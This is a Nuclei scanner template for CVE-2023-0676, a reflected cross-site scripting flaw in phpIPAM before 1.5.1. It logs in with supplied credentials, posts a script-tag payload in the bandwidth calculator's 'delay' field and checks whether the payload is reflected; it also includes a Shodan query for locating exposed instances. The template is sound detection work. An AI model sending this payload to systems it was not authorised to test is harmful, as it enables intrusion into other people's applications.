nuclei-templates/http/cves/2023/CVE-2023-0676.yaml

id: CVE-2023-0676

info:
  name: phpIPAM 1.5.1 - Cross-site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.    
  impact: |
    Allows attackers to execute malicious scripts in the context of a user's browser session.    
  remediation: |
    Update phpipam/phpipam to the latest version to patch the vulnerability.    
  reference:
    - https://huntr.dev/bounties/b72d4f0c-8a96-4b40-a031-7d469c6ab93b
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0676
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0676
    cwe-id: CWE-79
    epss-score: 0.00059
    epss-percentile: 0.24112
    cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:*
  metadata:
    vendor: phpipam
    product: phpipam
    shodan-query: html:"phpIPAM IP address management"
  tags: cve,cve2023,phpipam,xss,authenticated

http:
  - raw:
      - |
        POST /app/login/login_check.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ipamusername={{username}}&ipampassword={{password}}        

      - |
        POST /app/tools/ip-calculator/bw-calculator-result.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Referer: {{BaseURL}}/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator

        wsize=50000&delay=<script>alert(document.domain)</script>&fsize=1024        

    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "Login successful")
          - contains(body_2, "<script>alert(document.domain)</script>")
          - contains(content_type_2, "text/html")
          - status_code_2 == 200
        condition: and
# digest: 4a0a0047304502201a265b441a709395b056aae126dd0e67e08c24954bf1b2ff9f1b71321b85c92d02210095cee0b36b81d4f8e26f10af0b3041c5c14d014fa84bd3fe4b90d258d5bf30f6:922c64590222798bb761d5b6d8e72950